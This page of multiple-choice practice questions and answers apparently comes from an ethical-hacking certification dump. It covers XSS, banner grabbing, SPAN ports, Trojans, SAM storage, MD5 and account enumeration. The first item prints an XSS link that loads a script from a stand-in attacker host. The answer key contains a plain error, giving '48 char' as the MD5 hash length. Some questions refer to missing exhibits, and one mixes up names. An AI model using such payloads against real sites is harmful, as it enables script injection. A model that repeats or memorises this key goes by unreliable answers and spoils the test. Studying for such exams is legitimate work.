Topic 23, Mixed Questions
This is an attack that takes advantage of a web site vulnerability in which the site displays
content that includes un-sanitized user-provided data.
<ahref="http://foobar.com/index.html?id=%3Cscript-src=%22http://baddomain.com/bad
script.js%22%3E%3C/script%3E">See foobar</a>
What is this attack?
A.
Cross-site-scripting attack
B.
SQL Injection
C.
URL Traversal attack
D.
Buffer Overflow attack
Cross-site-scripting attack
You are the chief information officer for your company, a shipping company based out of
Oklahoma City. You are responsible for network security throughout the home office and all
branch offices. You have implemented numerous layers of security from logical to physical.
As part of your procedures, you perform a yearly network assessment which includes
vulnerability analysis, internal network scanning, and external penetration tests. Your main
concern currently is the server in the DMZ which hosts a number of company websites. To
see how the server appears to external users, you log onto a laptop at a Wi-Fi hot spot.
Since you already know the IP address of the web server, you create a telnet session to
that server and type in the command:
HEAD /HTTP/1.0
After typing in this command, you are presented with the following screen:
What are you trying to do here?
A.
You are attempting to send an html file over port 25 to the web server.
B.
By typing in the HEAD command, you are attempting to create a buffer overflow on the
web server.
C.
You are trying to open a remote shell to the web server.
D.
You are trying to grab the banner of the web server. *
You are trying to grab the banner of the web server. *
Neil is a network administrator working in Istanbul. Neil wants to setup a protocol analyzer
on his network that will receive a copy of every packet that passes through the main office
switch. What type of port will Neil need to setup in order to accomplish this?
A.
Neil will have to configure a Bridged port that will copy all packets to the protocol
analyzer.
B.
Neil will need to setup SPAN port that will copy all network traffic to the protocol
analyzer.
C.
He will have to setup an Ether channel port to get a copy of all network traffic to the
analyzer.
D.
He should setup a MODS port which will copy all network traffic.
Neil will need to setup SPAN port that will copy all network traffic to the protocol
analyzer.
Josh is the network administrator for Consultants Galore, an IT consulting firm based in
Kansas City. Josh is responsible for the company's entire network which consists of one
Windows Server 2003 Active Directory domain. Almost all employees have Remote
Desktop access to the servers so they can perform their work duties. Josh has created a
security group in Active Directory called "RDP Deny" which contains all the user accounts
that should not have Remote Desktop permission to any of the servers. What Group Policy
change can Jayson make to ensure that all users in the "RDP Deny" group cannot access
the company servers through Remote Desktop?
A.
Josh should add the "RDP Deny" group into the list of Restricted Groups to prevent the
users from accessing servers remotely.
B.
By adding the "RDP Deny" group to the "Deny logon as a service" policy, the users in
that security group will not be able to establish remote connections to any of the servers.
C.
He should add the "RDP Deny" group to the "Deny RDP connections to member
servers" policy.
D.
Josh needs to add the "RDP Deny" group to the "Deny logon through Terminal
Services" policy. *
Josh needs to add the "RDP Deny" group to the "Deny logon through Terminal
Services" policy. *
What type of Trojan is this?
A.
RAT Trojan
B.
E-Mail Trojan
C.
Defacement Trojan
D.
Destructing Trojan
E.
Denial of Service Trojan
Defacement Trojan
What is a sniffing performed on a switched network called?
A.
Spoofed sniffing
B.
Passive sniffing
C.
Direct sniffing
D.
Active sniffing
Active sniffing
What type of session hijacking attack is shown in the exhibit?
A.
Cross-site scripting Attack
B.
SQL Injection Attack
C.
Token sniffing Attack
D.
Session Fixation Attack
Session Fixation Attack
In which location, SAM hash passwords are stored in Windows 7?
A.
c:\windows\system32\config\SAM
B.
c:\winnt\system32\machine\SAM
C.
c:\windows\etc\drivers\SAM
D.
c:\windows\config\etc\SAM
c:\windows\system32\config\SAM
Drag the term to match with it’s description
Exhibit:
You generate MD5 128-bit hash on all files and folders on your computer to keep a
baseline check for security reasons?
What is the length of the MD5 hash?
A.
32 bit
B.
64 byte
C.
48 char
D.
128 kb
48 char
You are the security administrator for a large online auction company based out of
Los Angeles. After getting your ENSA CERTIFICATION last year, you have steadily
been fortifying your network’s security including training OS hardening and network
security. One of the last things you just changed for security reasons was to modify
all the built-in administrator accounts on the local computers of PCs and in Active
Directory. After through testing you found and no services or programs were
affected by the name changes.
Your company undergoes an outside security audit by a consulting company and
they said that even through all the administrator account names were changed, the
accounts could still be used by a clever hacker to gain unauthorized access. You
argue with the auditors and say that is not possible, so they use a tool and show you
how easy it is to utilize the administrator account even though its name was
changed.
What tool did the auditors use?
A.
sid2user
B.
User2sid
C.
GetAcct
D.
Fingerprint
sid2user
Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager)
from the local or a remote machine Sid2user.exe can then be used to retrieve the names of
all the user accounts and more.
Which of the following algorithms can be used to guarantee the integrity of
messages being sent, in transit, or stored? (Choose the best answer)
A.
symmetric algorithms
B.
asymmetric algorithms
C.
hashing algorithms
D.
integrity algorithms
hashing algorithms
Explanation: In cryptography, a cryptographic hash function is a hash function with certain
additional security properties to make it suitable for use as a primitive in various information
security applications, such as authentication and message integrity. A hash function takes
a long string (or 'message') of any length as input and produces a fixed length string as
output, sometimes termed a message digest or a digital fingerprint.
Page 27 out of 64 Pages |
Previous |